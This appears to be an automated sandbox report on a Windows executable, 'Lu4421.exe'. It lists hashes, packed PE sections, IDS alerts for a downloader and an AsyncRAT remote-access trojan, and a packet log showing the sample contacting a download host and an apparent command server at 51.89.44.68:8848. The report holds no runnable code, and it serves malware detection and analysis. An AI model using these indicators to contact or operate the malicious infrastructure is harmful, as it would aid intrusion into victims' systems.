                                                                                MD5:68E18F01120AFA1DE2969D61023B8374
                                                                                SHA1:8AD64F032F9F51303760256139B8F8633F1F4B26
                                                                                SHA-256:AE7493DA4C6A4544CAA18A1944E6A949BCD74B239102B2493FC7E613A1794E2F
                                                                                SHA-512:36600DB197070E68267A7D31A3985BB6C5BA2A98A83A02E59A4C860C110A1BD4EE586D40325F6E20CCA07EDDF02C82D0534F1D4542C77FA5A79E4C19F83C18F5
                                                                                Malicious:false
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZC..=Q.................................................................................................................................................................................................................................................................................................................................................2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):7.973829401437202
                                                                                TrID:
                                                                                • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                                                • Win64 Executable GUI (202006/5) 44.25%
                                                                                • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                                                • Win64 Executable (generic) (12005/4) 2.63%
                                                                                • Generic Win/DOS Executable (2004/3) 0.44%
                                                                                File name:Lu4421.exe
                                                                                File size:5'865'472 bytes
                                                                                MD5:e5358fca58c0e1b1e29eb195fb0f4675
                                                                                SHA1:a114c059fed08a501c344f40d9f702f03cdebbab
                                                                                SHA256:220c04c30a7dbd084fdebe00102f6340194845d8664dfd669a5549f23a1031c4
                                                                                SHA512:f072704ad3ffe2ad975972453f1a58fe3ccd4061ef275e833e60b593e79e65e9955fe841e7248002046e4c35472bbc9c946457f9608fe10c92fa07a9747ea8f3
                                                                                SSDEEP:98304:xkqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13r7INfWdpe:xkSIlLtzWAXAkuujCPX9YG9he5GnQCAe
                                                                                TLSH:3146331473F5069AF1FB6BB4E97141119E36BA07C077EA4C1958109C0EB3789AD22FBB
                                                                                File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..*9..........`... ....@...... ...............................=Z...`...@......@............... .....

                                                                                File Icon

                                                                                Icon Hash:90cececece8e8eb0

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0xd26000
                                                                                Entrypoint Section:.taggant
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
                                                                                Time Stamp:0xFFBE84BF [Sat Dec 19 14:25:03 2105 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:dc12932426806b6b47a373d7ae42c21d

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp 00007F5E1D07AE1Ah
                                                                                divps xmm3, dqword ptr [ecx+00h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                jmp 00007F5E1D07CE15h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx], bh
                                                                                add al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                jnle 00007F5E1D07AD92h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                iretd
                                                                                add dword ptr [eax], eax
                                                                                add byte ptr [eax], cl
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [eax+00000000h], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3980850xad.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3960000x53c.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                0x20000x3940000x394000ceec5083f285b2c1be8d061a39f91e2cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x3960000x53c0x400fb14019a6944b144187ed32a35b67085False0.6904296875data5.659166984958865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .idata 0x3980000x20000x200f556b29b2c3bed37b6a24754dd07217aFalse0.166015625data1.1919459888330979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                0x39a0000x38a0000x2007c37b2d3bde84d00b50b7fc7d29ad5fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                iubcysyr0x7240000x2000000x1ff4005307be4cfcf1ab435746dd4c576b558cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                tpxtcrvz0x9240000x20000x200ff4192a5c1ad550f8e65ea3f3799fbc4False0.587890625data4.534819229507492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .taggant0x9260000x40000x220096c9148d88dec28e0da1788ac9c5c22aFalse0.07192095588235294DOS executable (COM)0.9116417289365074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0x922dd80x348data0.43214285714285716
                                                                                RT_MANIFEST0x9231200x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                Imports

                                                                                DLLImport
                                                                                kernel32.dlllstrcpy
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-18T12:07:27.709803+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737185.199.108.133443TCP
                                                                                2024-12-18T12:07:32.534040+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)151.89.44.688848192.168.2.449739TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 18, 2024 12:07:21.132110119 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.132141113 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.132200956 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.140517950 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.140566111 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.140624046 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.140845060 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.140858889 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.140906096 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.150988102 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.151005983 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.151051998 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.151866913 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.151905060 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.151931047 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.151943922 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.151989937 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.152017117 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.319804907 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.319823980 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.321609020 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.321625948 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.321825981 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.321846962 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.322858095 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.322870016 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.323661089 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.323673010 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:21.323900938 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:21.323926926 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.534156084 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.534244061 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.536221981 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.536292076 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.537395954 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.537440062 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.537477016 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.537517071 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.537525892 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.537589073 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.538436890 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.538521051 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.543390036 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.543399096 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.543674946 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.545429945 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.545461893 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.545764923 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.546547890 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.546580076 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.546632051 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.546637058 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.546875954 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.547086954 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.548590899 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.548604012 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.548927069 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.550623894 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.550647020 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.550945044 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.585556030 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.601186037 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.601186037 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.601186991 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.601285934 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.601293087 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614398956 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614485025 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614526987 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614541054 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614778996 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.614989042 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.659324884 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.659333944 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.659337044 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.659337997 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.659346104 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.659349918 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.978499889 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.978576899 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.978619099 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.978688002 CET44349733185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:22.978698015 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.978755951 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:22.991360903 CET49733443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.018893003 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.019053936 CET44349732185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.019177914 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.019876957 CET49732443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.023808956 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.023993969 CET44349735185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.024049997 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.024626017 CET49735443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.030822039 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.030937910 CET44349731185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.031027079 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.031732082 CET49731443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.031956911 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.032016039 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.032049894 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.032077074 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.032107115 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.032121897 CET44349734185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.032166004 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.033237934 CET49734443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.036866903 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.036987066 CET44349730185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:23.037182093 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.038350105 CET49730443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:23.436557055 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:23.436605930 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:23.436670065 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:23.437084913 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:23.437103033 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.027563095 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.027698040 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.029829025 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.029853106 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.030139923 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.030983925 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.075336933 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.975148916 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.975263119 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.975317955 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.975327969 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.975339890 CET4434973620.233.83.145192.168.2.4
                                                                                Dec 18, 2024 12:07:25.975363970 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.975393057 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.975992918 CET49736443192.168.2.420.233.83.145
                                                                                Dec 18, 2024 12:07:25.980243921 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:25.980298042 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:25.980355978 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:25.980673075 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:25.980689049 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.187140942 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.188968897 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.188983917 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.709816933 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.709960938 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.709988117 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.710082054 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.710110903 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.710155964 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.718169928 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.726633072 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.726686001 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.726702929 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.734549046 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.734601974 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.734608889 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.742961884 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.743057966 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.743065119 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.788713932 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.829896927 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.882477045 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.882489920 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.929404974 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.944298983 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944312096 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944330931 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944339037 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944355965 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944406033 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.944416046 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.944463015 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.985382080 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.985390902 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.985413074 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.985420942 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.985454082 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.985467911 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:27.985479116 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:27.985507011 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:28.113924980 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.113939047 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.113967896 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.113996029 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.114017963 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:28.114033937 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.114043951 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:28.114069939 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:28.114083052 CET44349737185.199.108.133192.168.2.4
                                                                                Dec 18, 2024 12:07:28.114119053 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:28.114588976 CET49737443192.168.2.4185.199.108.133
                                                                                Dec 18, 2024 12:07:31.000942945 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.123153925 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:31.123289108 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.130796909 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:31.252428055 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.400490999 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.414112091 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:32.534039974 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.819859982 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:32.866838932 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.522430897 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.642007113 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:36.642131090 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:36.764986038 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:49.799540997 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:49.919255018 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:49.919450045 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.039088964 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.343367100 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.398133993 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.534435987 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.547136068 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.666969061 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:50.667062044 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:50.786784887 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:55.919564009 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:55.960784912 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:07:56.110668898 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:07:56.163779020 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.079360008 CET497398848192.168.2.451.89.44.68
